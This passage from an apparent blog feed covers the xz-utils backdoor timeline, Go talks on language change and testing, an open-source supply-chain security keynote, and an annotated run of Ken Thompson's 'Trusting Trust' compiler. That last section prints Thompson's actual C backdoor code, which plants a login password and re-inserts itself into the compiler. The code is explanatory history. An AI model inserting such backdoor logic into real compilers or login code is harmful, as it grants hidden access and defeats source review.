href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=18b845e69752c975dfeda418ec00eda22605c2ee">tags and builds his final release</a>, v5.4.1. <p> <b>2023-03-18</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=6ca8046ecbc7a1c81ee08f544bfd1414819fb2e8">tags and builds their first release</a>, v5.4.2. <p> <b>2023-03-20</b>: Jia Tan <a href="https://github.com/google/oss-fuzz/commit/6403e93344476972e908ce17e8244f5c2b957dfd">updates Google oss-fuzz configuration</a> to send bugs to them. 
<p> <b>2023-06-22</b>: Hans Jansen sends <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=23b5c36fb71904bfbe16bb20f976da38dadf6c3b">a pair</a> of <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=b72d21202402a603db6d512fb9271cfa83249639">patches</a>, merged by Lasse Collin, that use the “<a href="https://maskray.me/blog/2021-01-18-gnu-indirect-function">GNU indirect function</a>” feature to select a fast CRC function at startup time. The final commit is <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=ee44863ae88e377a5df10db007ba9bfadde3d314">reworked by Lasse Collin</a> and merged by Jia Tan. This change is important because it provides a hook by which the backdoor code can modify the global function tables before they are remapped read-only. While this change could be an innocent performance optimization by itself, Hans Jansen returns in 2024 to promote the backdoored xz and otherwise does not exist on the internet. <p> <b>2023-07-07</b>: Jia Tan <a href="https://github.com/google/oss-fuzz/commit/d2e42b2e489eac6fe6268e381b7db151f4c892c5">disables ifunc support during oss-fuzz builds</a>, claiming ifunc is incompatible with address sanitizer. This may well be innocuous on its own, although it is also more groundwork for using ifunc later. <p> <b>2024-01-19</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=c26812c5b2c8a2a47f43214afe6b0b840c73e4f5">moves web site to GitHub pages</a>, giving them control over the XZ Utils web page. Lasse Collin presumably created the DNS records for the xz.tukaani.org subdomain that points to GitHub pages. After the attack was discovered, Lasse Collin deleted this DNS record to move back to <a href="https://tukaani.org">tukaani.org</a>, which he controls. <a class=anchor href="#attack_begins"><h2 id="attack_begins">Attack begins</h2></a> <p> <b>2024-02-23</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0">merges hidden backdoor binary code</a> well hidden inside some binary test input files. The README already said (from long before Jia Tan showed up) “This directory contains bunch of files to test handling of .xz, .lzma (LZMA_Alone), and .lz (lzip) files in decoder implementations. Many of the files have been created by hand with a hex editor, thus there is no better “source code” than the files themselves.” Having these kinds of test files is very common for this kind of library. Jia Tan took advantage of this to add a few files that wouldn’t be carefully reviewed. <p> <b>2024-02-24</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=2d7d862e3ffa8cec4fd3fdffcd84e984a17aa429">tags and builds v5.6.0</a> and publishes an xz-5.6.0.tar.gz distribution with an extra, malicious build-to-host.m4 that adds the backdoor when building a deb/rpm package. This m4 file is not present in the source repository, but many other legitimate ones are added during packaging as well, so it’s not suspicious by itself. But the script has been modified from the usual copy to add the backdoor. See my <a href="xz-script">xz attack shell script walkthrough post</a> for more. <p> <b>2024-02-24</b>: Gentoo <a href="https://bugs.gentoo.org/925415">starts seeing crashes in 5.6.0</a>. This seems to be an actual ifunc bug, rather than a bug in the hidden backdoor, since this is the first xz with Hans Jansen’s ifunc changes, and Gentoo does not patch sshd to use libsystemd, so it doesn’t have the backdoor.
<p> <b>2024-02-26</b>: Debian <a href="https://tracker.debian.org/news/1506761/accepted-xz-utils-560-01-source-into-unstable/">adds xz-utils 5.6.0-0.1</a> to unstable. <p> <b>2024-02-27</b>: Jia Tan starts emailing Richard W.M. Jones to update Fedora 40 (privately confirmed by Rich Jones). <p> <b>2024-02-28</b>: Debian <a href="https://tracker.debian.org/news/1507917/accepted-xz-utils-560-02-source-into-unstable/">adds xz-utils 5.6.0-0.2</a> to unstable. <p> <b>2024-02-28</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=a100f9111c8cc7f5b5f0e4a5e8af3de7161c7975">breaks landlock detection</a> in configure script by adding a subtle typo in the C program used to check for <a href="https://docs.kernel.org/userspace-api/landlock.html">landlock support</a>. The configure script tries to build and run the C program to check for landlock support, but since the C program has a syntax error, it will never build and run, and the script will always decide there is no landlock support. Lasse Collin is listed as the committer; he may have missed the subtle typo, or the author may be forged. Probably the former, since Jia Tan did not bother to forge committer on his many other changes. This patch seems to be setting up for something besides the sshd change, since landlock support is part of the xz command and not liblzma. Exactly what is unclear. <p> <b>2024-02-29</b>: On GitHub, @teknoraver <a href="https://github.com/systemd/systemd/pull/31550">sends pull request</a> to stop linking liblzma into libsystemd. It appears that this would have defeated the attack. <a href="https://doublepulsar.com/inside-the-failed-attempt-to-backdoor-ssh-globally-that-got-caught-by-chance-bbfe628fafdd">Kevin Beaumont speculates</a> that knowing this was on the way may have accelerated the attacker’s schedule. @teknoraver <a href="https://news.ycombinator.com/item?id=39916125">commented on HN</a> that the liblzma PR was one in a series of dependency slimming changes for libsystemd; there were <a href="https://github.com/systemd/systemd/pull/31131#issuecomment-1917693005">two</a> <a href="https://github.com/systemd/systemd/pull/31131#issuecomment-1918667390">mentions</a> of it in late January. <p> <b>2024-03-04</b>: RedHat distributions <a href="https://bugzilla.redhat.com/show_bug.cgi?id=2267598">start seeing Valgrind errors</a> in liblzma’s <code>_get_cpuid</code> (the entry to the backdoor). The race is on to fix this before the Linux distributions dig too deeply. <p> <b>2024-03-05</b>: The <a href="https://github.com/systemd/systemd/commit/3fc72d54132151c131301fc7954e0b44cdd3c860">libsystemd PR is merged</a> to remove liblzma. Another race is on, to get liblzma backdoor’ed before the distros break the approach entirely. <p> <b>2024-03-05</b>: Debian <a href="https://tracker.debian.org/news/1509743/xz-utils-560-02-migrated-to-testing/">adds xz-utils 5.6.0-0.2</a> to testing. <p> <b>2024-03-05</b>: Jia Tan commits <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=ed957d39426695e948b06de0ed952a2fbbe84bd1">two ifunc</a> <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=4e1c97052b5f14f4d6dda99d12cbbd01e66e3712">bug fixes</a>. These seem to be real fixes for the actual ifunc bug. One commit links to the Gentoo bug and also typos an <a href="https://gcc.gnu.org/bugzilla/show_bug.cgi?id=114115">upstream GCC bug</a>. <p> <b>2024-03-08</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=82ecc538193b380a21622aea02b0ba078e7ade92">commits purported Valgrind fix</a>. 
This is a misdirection, but an effective one. <p> <b>2024-03-09</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=74b138d2a6529f2c07729d7c77b1725a8e8b16f1">commits updated backdoor files</a>. This is the actual Valgrind fix, changing the two test files containing the attack code. “The original files were generated with random local to my machine. To better reproduce these files in the future, a constant seed was used to recreate these files.” <p> <b>2024-03-09</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=fd1b975b7851e081ed6e5cf63df946cd5cbdbb94">tags and builds v5.6.1</a> and publishes xz 5.6.1 distribution, containing a new backdoor. To date I have not seen any analysis of how the old and new backdoors differ. <p> <b>2024-03-20</b>: Lasse Collin sends LKML a patch set <a href="https://lkml.org/lkml/2024/3/20/1009">replacing his personal email</a> with <a href="https://lkml.org/lkml/2024/3/20/1008">both himself and Jia Tan</a> as maintainers of the xz compression code in the kernel. There is no indication that Lasse Collin was acting nefariously here, just cleaning up references to himself as sole maintainer. Of course, Jia Tan may have prompted this, and being able to send xz patches to the Linux kernel would have been a nice point of leverage for Jia Tan’s future work. We’re not at <a href="nih">trusting trust</a> levels yet, but it would be one step closer. <p> <b>2024-03-25</b>: Hans Jansen is back (!), <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708">filing a Debian bug</a> to get xz-utils updated to 5.6.1. Like in the 2022 pressure campaign, more name###@mailhost addresses that don’t otherwise exist on the internet show up to advocate for it. <p> <b>2024-03-27</b>: Debian updates to 5.6.1. <p> <b>2024-03-28</b>: Jia Tan <a href="https://bugs.launchpad.net/ubuntu/+source/xz-utils/+bug/2059417">files an Ubuntu bug</a> to get xz-utils updated to 5.6.1 from Debian. <a class=anchor href="#attack_detected"><h2 id="attack_detected">Attack detected</h2></a> <p> <b>2024-03-28</b>: Andres Freund discovers bug, privately notifies Debian and distros@openwall. RedHat assigns CVE-2024-3094. <p> <b>2024-03-28</b>: Debian <a href="https://tracker.debian.org/news/1515519/accepted-xz-utils-561really545-1-source-into-unstable/">rolls back 5.6.1</a>, introducing 5.6.1+really5.4.5-1. <p> <b>2024-03-28</b>: Arch Linux <a href="https://gitlab.archlinux.org/archlinux/packaging/packages/xz/-/commit/881385757abdc39d3cfea1c3e34ec09f637424ad">changes 5.6.1 to build from Git</a>. <p> <b>2024-03-29</b>: Andres Freund <a href="https://www.openwall.com/lists/oss-security/2024/03/29/4">posts backdoor warning</a> to public oss-security@openwall list, saying he found it “over the last weeks”. <p> <b>2024-03-29</b>: RedHat <a href="https://www.redhat.com/en/blog/urgent-security-alert-fedora-41-and-rawhide-users">announces that the backdoored xz shipped</a> in Fedora Rawhide and Fedora Linux 40 beta. <p> <b>2024-03-30</b>: Debian <a href="https://fulda.social/@Ganneff/112184975950858403">shuts down builds</a> to rebuild their build machines using Debian stable (in case the malware xz escaped their sandbox?). <p> <b>2024-03-30</b>: Haiku OS <a href="https://github.com/haikuports/haikuports/commit/3644a3db2a0ad46971aa433c105e2cce9d141b46">moves to GitHub source repo snapshots</a>.
<a class=anchor href="#further_reading"><h2 id="further_reading">Further Reading</h2></a> <ul> <li> Evan Boehs, <a href="https://boehs.org/node/everything-i-know-about-the-xz-backdoor">Everything I know about the XZ backdoor</a> (2024-03-29). <li> Filippo Valsorda, <a href="https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b">Bluesky</a> re backdoor operation (2024-03-30). <li> Michał Zalewski, <a href="https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor">Techies vs spies: the xz backdoor debate</a> (2024-03-30). <li> Michał Zalewski, <a href="https://lcamtuf.substack.com/p/oss-backdoors-the-allure-of-the-easy">OSS backdoors: the folly of the easy fix</a> (2024-03-31). <li> Connor Tumbleson, <a href="https://connortumbleson.com/2024/03/31/watching-xz-unfold-from-afar/">Watching xz unfold from afar</a> (2024-03-31). <li> nugxperience, <a href="https://twitter.com/nugxperience/status/1773906926503591970">Twitter</a> re awk and rc4 (2024-03-29) <li> birchb0y, <a href="https://twitter.com/birchb0y/status/1773871381890924872">Twitter</a> re time of day of commit vs level of evil (2024-03-29) <li> Dan Feidt, <a href="https://unicornriot.ninja/2024/xz-utils-software-backdoor-uncovered-in-years-long-hacking-plot/">‘xz utils’ Software Backdoor Uncovered in Years-Long Hacking Plot</a> (2024-03-30) <li> smx-smz, <a href="https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504">[WIP] XZ Backdoor Analysis and symbol mapping</a> <li> Dan Goodin, <a href="https://arstechnica.com/security/2024/04/what-we-know-about-the-xz-utils-backdoor-that-almost-infected-the-world/">What we know about the xz Utils backdoor that almost infected the world</a> (2024-04-01) <li> Akamai Security Intelligence Group, <a href="https://www.akamai.com/blog/security-research/critical-linux-backdoor-xz-utils-discovered-what-to-know">XZ Utils Backdoor — Everything You Need to Know, and What You Can Do</a> (2024-04-01) <li> Kevin Beaumont, <a href="https://doublepulsar.com/inside-the-failed-attempt-to-backdoor-ssh-globally-that-got-caught-by-chance-bbfe628fafdd">Inside the failed attempt to backdoor SSH globally — that got caught by chance</a> (2024-03-31) <li> amlweems, <a href="https://github.com/amlweems/xzbot">xzbot: notes, honeypot, and exploit demo for the xz backdoor</a> (2024-04-01) <li> Rhea Karty and Simon Henniger, <a href="https://rheaeve.substack.com/p/xz-backdoor-times-damned-times-and">XZ Backdoor: Times, damned times, and scams</a> (2024-03-30) <li> Andy Greenberg and Matt Burgess, <a href="https://www.wired.com/story/jia-tan-xz-backdoor/">The Mystery of ‘Jia Tan,’ the XZ Backdoor Mastermind</a> (2024-04-03) <li> <a href="https://risky.biz/RB743/">Risky Business #743 -- A chat about the xz backdoor with the guy who found it</a> (2024-04-03)</ul> Go Changes tag:research.swtch.com,2012:research.swtch.com/gochanges 2023-12-08T12:00:00-05:00 2023-12-08T12:02:00-05:00 The way Go changes, and how to improve it with telemetry. <p> I opened GopherCon (USA) in October with the talk “Go Changes”, which looked at how Go evolves, the importance of data in making shared decisions, and why opt-in telemetry in the Go toolchain is a useful, effective, and appropriate new source of data. 
<p> I re-recorded it at home and have posted it here: <div style="border: 1px solid black; margin: auto; margin-top: 1em; margin-bottom: 1em; width:560px; height:315px;"> <iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/BNmxtp26I5s?si=3ZpIWEA72ehzJrVO" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe> </div> <p> Links: <ul> <li> <a href="https://go.dev/s/proposal">The Go Proposal Process</a> <li> <a href="sample">The Magic of Sampling</a> <li> <a href="telemetry">Go Telemetry Blog Posts</a></ul> <p> Errata: <ul> <li> There is a mistake in the probability discussion: (2/3)<sup>100</sup> is about 2.46×10<sup>–18</sup>, not 1.94×10<sup>–48</sup>. The latter is (1/3)<sup>100</sup>. The probability of pulling 100 gophers without getting the third color remains vanishingly small. Apologies for the mistake.</ul> Go Testing By Example tag:research.swtch.com,2012:research.swtch.com/testing 2023-12-05T08:00:00-05:00 2023-12-05T08:02:00-05:00 The importance of testing, and twenty tips for writing good tests. <p> I opened GopherCon Australia in early November with the talk “Go Testing By Example”. Being the first talk, there were some A/V issues, so I re-recorded it at home and have posted it here: <div style="border: 1px solid black; margin: auto; margin-top: 1em; margin-bottom: 1em; width:560px; height:315px;"> <iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/X4rxi9jStLo?si=DJiEGUPNxPlYnlWL" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe> </div> <p> Here are the 20 tips from the talk: <ol> <li> Make it easy to add new test cases. <li> Use test coverage to find untested code. <li> Coverage is no substitute for thought. <li> Write exhaustive tests. <li> Separate test cases from test logic. <li> Look for special cases. <li> If you didn’t add a test, you didn’t fix the bug. <li> Not everything fits in a table. <li> Test cases can be in testdata files. <li> Compare against other implementations. <li> Make test failures readable. <li> If the answer can change, write code to update them. <li> Use <a href="https://pkg.go.dev/golang.org/x/tools/txtar">txtar</a> for multi-file test cases. <li> Annotate existing formats to create testing mini-languages. <li> Write parsers and printers to simplify tests. <li> Code quality is limited by test quality. <li> Scripts make good tests. <li> Try <a href="https://pkg.go.dev/rsc.io/script">rsc.io/script</a> for your own script-based test cases. <li> Improve your tests over time. <li> Aim for continuous deployment.</ol> <p> Enjoy! Open Source Supply Chain Security at Google tag:research.swtch.com,2012:research.swtch.com/acmscored 2023-11-30T04:10:00-05:00 2023-11-30T04:12:00-05:00 A remote talk at ACM SCORED 2023 <p> I was a remote opening keynote speaker at <a href="https://scored.dev/">ACM SCORED 2023</a>, which we decided meant that I sent a video to play and I was on Discord during the talk for attendees to text directly with question as the video played, and then we did some live but still remote Q&amp;A after the talk. <p> My talk was titled “Open Source Supply Chain Security at Google” and was 45 minutes long. I spent a while at the start defining open source supply chain security and a while at the end on comparisons with the 1970s. 
In between, I talked about various supply chain-related efforts at Google. All the Google efforts mentioned in the talk have been publicly discussed elsewhere and are linked below. <div style="border: 1px solid black; margin: auto; margin-top: 1em; margin-bottom: 1em; width:560px; height:315px;"> <iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/6H-V-0oQvCA?si=mprcItvmNMw5QnR0" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe> </div> <p> Here are the <a href="https://youtu.be/6H-V-0oQvCA">talk video</a> and <a href="acmscored.pdf">talk slides</a>. Opinions expressed in the talk about languages and the last half century of supply chain security are mine, not Google’s. <p> References or acknowledgements for the slides: <ul> <li> Crypto AG: <a href="https://www.theguardian.com/us-news/2020/feb/11/crypto-ag-cia-bnd-germany-intelligence-report">Guardian</a> and <a href="https://www.washingtonpost.com/graphics/2020/world/national-security/cia-crypto-encryption-machines-espionage/">Washington Post</a> <li> Enigma photograph: personal photo, taken at Bletchley Park in 2012 <li> XcodeGhost: <a href="https://unit42.paloaltonetworks.com/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/">Palo Alto Networks</a> <li> Juniper Attack: <a href="https://cacm.acm.org/magazines/2018/11/232227-where-did-i-leave-my-keys/fulltext">CACM</a>, <a href="https://eprint.iacr.org/2016/376.pdf">Eprint</a>, <a href="https://www.bloomberg.com/news/features/2021-09-02/juniper-mystery-attacks-traced-to-pentagon-role-and-chinese-hackers">Bloomberg</a> <li> SolarWinds: <a href="https://www.wired.com/story/the-untold-story-of-solarwinds-the-boldest-supply-chain-hack-ever/">Wired (Kim Zetter)</a> <li> NPM event-stream: <a href="https://arstechnica.com/information-technology/2018/11/hacker-backdoors-widely-used-open-source-software-to-steal-bitcoin/">Ars Technica</a>, <a href="https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident">NPM</a> <li> iMessage JBIG2: <a href="https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html">Project Zero</a> <li> Log4j: <a href="https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition">Minecraft</a>, <a href="https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance">CISA</a> <li> <a href="https://deps.dev/go/k8s.io%2Fkubernetes/v1.28.4/dependencies/graph">Kubernetes on Open Source Insights</a> and <a href="https://deps.dev/go/k8s.io%2Fkubernetes/v1.28.4/compare?v2=v1.29.0-rc.0">comparing versions</a> <li> <a href="https://www.sigstore.dev/">Sigstore</a> <li> “<a href="https://go.dev/blog/rebuild">Perfectly Reproducible, Verified Go Toolchains</a>” <li> “<a href="https://go.dev/blog/supply-chain">How Go Mitigates Supply Chain Attacks</a>” <li> Two-person photograph: <a href="https://www.nationalmuseum.af.mil/Visit/Museum-Exhibits/Fact-Sheets/Display/Article/197675/launching-missiles/">Air Force National Museum</a>, public domain <li> <a href="https://slsa.dev/spec/v1.0/levels">SLSA (Supply-chain Levels for Software Artifacts)</a> <li> <a href="https://securityscorecards.dev/">Security Scorecards</a> <li> Capslock: <a href="https://security.googleblog.com/2023/09/capslock-what-is-your-code-really.html">blog post</a>, <a href="https://github.com/google/capslock">repository</a> <li> Google <a 
href="https://bughunters.google.com/open-source-security">Open Source Security Rewards</a> <li> Google Project Zero: <a href="https://security.googleblog.com/2014/07/announcing-project-zero.html">blog post</a>, <a href="https://www.youtube.com/watch?v=My_13FXODdU">excellent video</a> <li> OSS-Fuzz: <a href="https://opensource.googleblog.com/2016/12/announcing-oss-fuzz-continuous-fuzzing.html">blog post</a>, <a href="https://github.com/google/oss-fuzz">repository</a> <li> <a href="https://syzkaller.appspot.com/upstream">Syzkaller dashboard</a> <li> Internet worm: <a href="https://timesmachine.nytimes.com/timesmachine/1988/11/04/issue.html">New York Times</a> <li> <a href="https://media.defense.gov/2022/Nov/10/2003112742/-1/-1/0/CSI_SOFTWARE_MEMORY_SAFETY.PDF">NSA Software Memory Safety</a> <li> <a href="https://go.dev/">Go home page</a> <li> <a href="https://www.rust-lang.org/">Rust home page</a> <li> SBOMs: “<a href="https://www.ntia.gov/sites/default/files/publications/ntia_sbom_framing_2nd_edition_20211021_0.pdf">NTIA: Framing Software Component Transparency</a>”, “<a href="https://www.cisa.gov/sites/default/files/2023-10/Software-Identification-Ecosystem-Option-Analysis-508c.pdf">CISA: Software Identification Ecosystem Option Analysis</a>” <li> <a href="https://osv.dev">Open Source Vulnerability</a> database <li> Govulncheck: <a href="https://go.dev/blog/govulncheck">blog post</a>, <a href="https://pkg.go.dev/golang.org/x/vuln/cmd/govulncheck">package docs</a>, <a href="https://go.dev/doc/tutorial/govulncheck">tutorial</a> <li> <a href="https://cloud.google.com/artifact-registry/docs/analysis">Google Cloud Artifact Analysis</a> <li> <a href="https://seclab.cs.ucdavis.edu/projects/history/papers/karg74.pdf">Air Force Review of Multics</a> (quotes are from pages numbered 51 and 52 on the paper, aka PDF pages 55 and 56) <li> Thompson backdoor: “<a href="https://dl.acm.org/doi/10.1145/358198.358210">Reflections on Trusting Trust</a>” (1983) and <a href="https://research.swtch.com/nih">annotated code</a> (2023)</ul> Running the “Reflections on Trusting Trust” Compiler tag:research.swtch.com,2012:research.swtch.com/nih 2023-10-25T21:00:00-04:00 2023-10-25T21:00:00-04:00 Ken Thompson’s Turing award lecture, running in your browser. <style> body { font-family: 'Minion 3'; } .nih pre { padding-top: 0.2em; margin: 0; } .nih { border-spacing: 0; } .nih tr { padding: 0; } .nih td { padding: 0.5em; min-width: 25em; } .nih td { vertical-align: top; } .nih td.l { font-style: italic; } .nih td.r { background-color: #eee; } .nih td p { text-align: right; clear: both; margin-block-start: 0; margin-block-end: 0; } .nih td div { float: right; } .string { color: #700; } .del { color: #aaa; } .ins { font-weight: bold; } </style> <p> Supply chain security is a hot topic today, but it is a very old problem. In October 1983, 40 years ago this week, Ken Thompson chose supply chain security as the topic for his Turing award lecture, although the specific term wasn’t used back then. (The field of computer science was still young and small enough that the ACM conference where Ken spoke was the “Annual Conference on Computers.”) Ken’s lecture was later published in <i>Communications of the ACM</i> under the title “<a href="https://dl.acm.org/doi/pdf/10.1145/358198.358210">Reflections on Trusting Trust</a>.” It is a classic paper, and a short one (3 pages); if you haven’t read it yet, you should. This post will still be here when you get back. 
</p> <p> In the lecture, Ken explains in three steps how to modify a C compiler binary to insert a backdoor when compiling the “login” program, leaving no trace in the source code. In this post, we will run the backdoored compiler using Ken’s actual code. But first, a brief summary of the important parts of the lecture. </p> <a class=anchor href="#step1"><h2 id="step1">Step 1: Write a Self-Reproducing Program</h2></a> <p> Step 1 is to write a program that prints its own source code. Although the technique was not widely known in 1975, such a program is now known in computing as a “<a href="https://en.wikipedia.org/wiki/Quine_(computing)">quine</a>,” popularized by Douglas Hofstadter in <i>Gödel, Escher, Bach</i>. Here is a Python quine, from <a href="https://cs.lmu.edu/~ray/notes/quineprograms/">this collection</a>: </p> <pre> s=<span class="string">’s=%r;print(s%%s)’</span>;print(s%s) </pre> <p> And here is a slightly less cryptic Go quine: </p> <pre> package main func main() { print(q + "\x60" + q + "\x60") } var q = <span class=string>`package main func main() { print(q + "\x60" + q + "\x60") } var q = `</span> </pre> <p>The general idea of the solution is to put the text of the program into a string literal, with some kind of placeholder where the string itself should be repeated. Then the program prints the string literal, substituting that same literal for the placeholder. In the Python version, the placeholder is <code>%r</code>; in the Go version, the placeholder is implicit at the end of the string. For more examples and explanation, see my post “<a href="zip">Zip Files All The Way Down</a>,” which uses a Lempel-Ziv quine to construct a zip file that contains itself. </p> <a class=anchor href="#step2"><h2 id="step2">Step 2: Compilers Learn</h2></a> <p> Step 2 is to notice that when a compiler compiles itself, there can be important details that persist only in the compiler binary, not in the actual source code. Ken gives the example of the numeric values of escape sequences in C strings. You can imagine a compiler containing code like this during the processing of escaped string literals: </p> <pre> c = next(); if(c == '\\') { c = next(); if(c == 'n') c = '\n'; } </pre> <p> That code is responsible for processing the two character sequence <code>\n</code> in a string literal and turning it into a corresponding byte value, specifically <code>’\n’</code>. But that’s a circular definition, and the first time you write code like that it won’t compile. So instead you write <code>c = 10</code>, you compile and install the compiler, and <i>then</i> you can change the code to <code>c = ’\n’</code>. The compiler has “learned” the value of <code>’\n’</code>, but that value only appears in the compiler binary, not in the source code. </p> <a class=anchor href="#step3"><h2 id="step3">Step 3: Learn a Backdoor</h2></a> <p> Step 3 is to put these together to help the compiler “learn” to miscompile the target program (<code>login</code> in the lecture). It is fairly straightforward to write code in a compiler to recognize a particular input program and modify its code, but that code would be easy to find if the compiler source were inspected. Instead, we can go deeper, making two changes to the compiler: </p> <ol> <li>Recognize <code>login</code> and insert the backdoor. <li>Recognize the compiler itself and insert the code for these two changes. 
</ol> <p> The “insert the code for these two changes” step requires being able to write a self-reproducing program: the code must reproduce itself into the new compiler binary. At this point, the compiler binary has “learned” the miscompilation steps, and the clean source code can be restored. </p> <a class=anchor href="#run"><h2 id="run">Running the Code</h2></a> <p>At the Southern California Linux Expo in March 2023, Ken gave the closing keynote, <a href="https://www.youtube.com/live/kaandEt_pKw?si=RGKrC8c0B9_AdQ9I&t=643">a delightful talk</a> about his 75-year effort accumulating what must be the world’s largest privately held digital music collection, complete with actual jukeboxes and a player piano (video opens at 10m43s, when his talk begins). During the Q&A session, someone <a href="https://www.youtube.com/live/kaandEt_pKw?si=koOlE35Q3mjqH4yf&t=3284">jokingly asked</a> about the Turing award lecture, specifically “can you tell us right now whether you have a backdoor into every copy of gcc and Linux still today?” Ken replied: </p> <blockquote> I assume you’re talking about some paper I wrote a long time ago. No, I have no backdoor. That was very carefully controlled, because there were some spectacular fumbles before that. I got it released, or I got somebody to steal it from me, in a very controlled sense, and then tracked whether they found it or not. And they didn’t. But they broke it, because of some technical effect, but they didn’t find out what it was and then track it. So it never got out, if that’s what you’re talking about. I hate to say this in front of a big audience, but the one question I’ve been waiting for since I wrote that paper is “you got the code?” Never been asked. I still have the code. </blockquote> <p>Who could resist that invitation!? Immediately after watching the video on YouTube in September 2023, I emailed Ken and asked him for the code. Despite my being six months late, he said I was the first person to ask and mailed back an attachment called <code>nih.a</code>, a cryptic name for a cryptic program. (Ken tells me it does in fact stand for “not invented here.”) Normally today, <code>.a</code> files are archives containing compiler object files, but this one contains two source files.</p> <p> The code applies cleanly to the C compiler from the <a href="https://en.wikipedia.org/wiki/Research_Unix">Research Unix Sixth Edition (V6)</a>. I’ve posted an online emulator that runs V6 Unix programs and populated it with some old files from Ken and Dennis, including <code>nih.a</code>. Let’s actually run the code. You can <a href="https://research.swtch.com/v6">follow along in the simulator</a>.</p> <table class="nih"> <tr> <td class=l> <p>Login as <code>ken</code>, password <code>ken</code>.<br> (The password is normally not shown.) <td class=r><pre>login: <b>ken</b> Password: <b>ken</b> % <b>who</b> ken tty8 Aug 14 22:06 % </pre> <tr> <td class=l> <p>Change to and list the <code>nih</code> directory,<br> discovering a Unix archive. <td class=r><pre> % <b>chdir nih</b> % <b>ls</b> nih.a </pre> <tr> <td class=l> <p>Extract <code>nih.a</code>. <td class=r><pre> % <b>ar xv nih.a</b> x x.c x rc </pre> <tr> <td class=l> <p>Let’s read <code>x.c</code>, a C program. <td class=r><pre> % <b>cat x.c</b> </pre> <tr> <td class=l> <p>Declare the global variable <code>nihflg</code>,<br> of implied type <code>int</code>. 
<td class=r><pre> nihflg; </pre> <tr> <td class=l> <p> Define the function <code>codenih</code>, with implied<br> return type <code>int</code> and no arguments.<br> The compiler will be modified to call <code>codenih</code><br> during preprocessing, for each input line. <td class=r><pre> codenih() { char *p,*s; int i; </pre> <tr> <td class=l> <p><code>cc -p</code> prints the preprocessor output<br> instead of invoking the compiler back end.<br> To avoid discovery, do nothing when <code>-p</code> is used.<br> The implied return type of <code>codenih</code> is <code>int</code>,<br> but early C allowed omitting the return value. <td class=r><pre> if(pflag) return; </pre> <tr> <td class=l> <p>Skip leading tabs in the line. <td class=r><pre> p=line; while(*p=='\t') p++; </pre> <tr> <td class=l> <p>Look for the line<br> “<code>namep = crypt(pwbuf);</code>” from <a href="login.c#crypt"><code>login.c</code></a>.<br> If not found, jump to <code>l1</code>. <td class=r><pre> s="namep = crypt(pwbuf);"; for(i=0;i&lt;21;i++) if(s[i]!=p[i]) goto l1; </pre> <tr> <td class=l> <p>Define <code>login</code> backdoor code <code>s</code>, which does:<br> Check for the password “<code>codenih</code>”.<br> If found, modify <code>namep</code> and <code>np</code><br> so that the code that follows in <br> <a href="login.c#crypt"><code>login.c</code></a> will accept the password. <td class=r><pre> p=+i; s="for(c=0;c&lt;8;c++)" "if(\"codenih\"[c]!=pwbuf[c])goto x1x;" "while(*namep)namep++;" "while(*np!=':')np++;x1x:"; </pre> <tr> <td class=l> <p>With the <code>p=+i</code> from above,<br> this is: <code>strcpy(p+i, s); return;</code>,<br> appending the backdoor to the line.<br> In early C, <code>+=</code> was spelled <code>=+</code>.<br> The loop is <code>strcpy</code>, and <code>goto l4</code><br> jumps to the end of the function. <td class=r><pre> for(i=0;;i++) if(!(*p++=s[i])) break; goto l4; </pre> <tr> <td class=l> <p>No match for <code>login</code> code. Next target:<br> the distinctive line “<code>av[4] = "-P";</code>”<br> from <a href="cc.c#av4">cc.c</a>. If not found, jump to <code>l2</code>. <td class=r><pre> l1: s="av[4] = \"-P\";"; for(i=0;i&lt;13;i++) if(s[i]!=p[i]) goto l2; </pre> <tr> <td class=l> <p>Increment <code>nihflg</code> to 1 to remember<br> evidence of being in <code>cc.c</code>, and return. <td class=r><pre> nihflg++; goto l4; </pre> <tr> <td class=l> <p> Next target: <a href="cc.c#getline">input reading loop in <code>cc.c</code></a>,<br> but only if we’ve seen the <code>av[4]</code> line too:<br> the text “<code>while(getline()) {</code>”<br> is too generic and may be in other programs.<br> If not found, jump to <code>l3</code>. <td class=r><pre> l2: if(nihflg!=1) goto l3; s="while(getline()) {"; for(i=0;i&lt;18;i++) if(s[i]!=p[i]) goto l3; </pre> <tr> <td class=l> <p> Append input-reading backdoor: call <code>codenih</code><br> (this very code!) after reading each line.<br> Increment <code>nihflg</code> to 2 to move to next state. <td class=r><pre> p=+i; s="codenih();"; for(i=0;;i++) if(!(*p++=s[i])) break; nihflg++; 